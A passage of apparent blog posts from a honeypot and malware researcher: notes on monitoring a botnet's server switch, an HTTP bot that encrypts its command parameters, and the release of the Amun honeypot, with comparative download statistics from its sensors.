unfortunately, his exploit did not send any shellcode...by the way the ftp server is listening on port 723

today i was able to monitor a botnet switching the server, pretty interesting thing. monitoring was accomplished with the new infiltrator software, which is not released yet =)

enjoy the last commands on the old server and channel:

i stumbled over a HTTP based bot, which uses encryption for commands and URL parameters. i have not seen this before so i decided to let you all know about it.

another interesting thing is, the binary does not run with the anubis sandbox, but with cwsandbox.

the following parameters are used:

• guid
• version
• clientid
• time
• locale
• idle
• activeWindows
• crc

the values look like this:

• E723E7BF51[...]DA96
• F01[...]B1
• AB0E[...]0F7

 (More)

I decided to release a first version of Amun to the public. Amun is released under the GNU Public Licence. The software is available here: http://zero.ram.rwth-aachen.de/amun/

Amun is a low-interaction honeypot designed to capture autonomous spreading malware, like for example nepenthes. The main difference is, that it is written in python and most parameters can be changed while running, thus it might be easier to add new features.

the replace local IP function is now fully implemented in Amun. I had some minor issues which needed to be fixed, but its working now. Currently we are running two Amun sensors with about 7000 IP addresses each. One of the sensors is running with replace local IPs turned on, the other one turned off.

Now the interesting thing is, currently, the sensor which does not replace local IPs and therefore has less downloads, has however, much more unique downloads. It seems like replacing local IPs to have more downloads does not actually mean you get all the new ones.

Some Numbers:
Amun (replace locals on): average (overall) downloads per day: 70
Amun (replace locals off): average (overall) downloads per day: 10
Both Sensors running at this settings for 5 days now and sensor number two (with replace locals turned off) currently has 16 unique samples more, that´s about 3 unique samples more per day.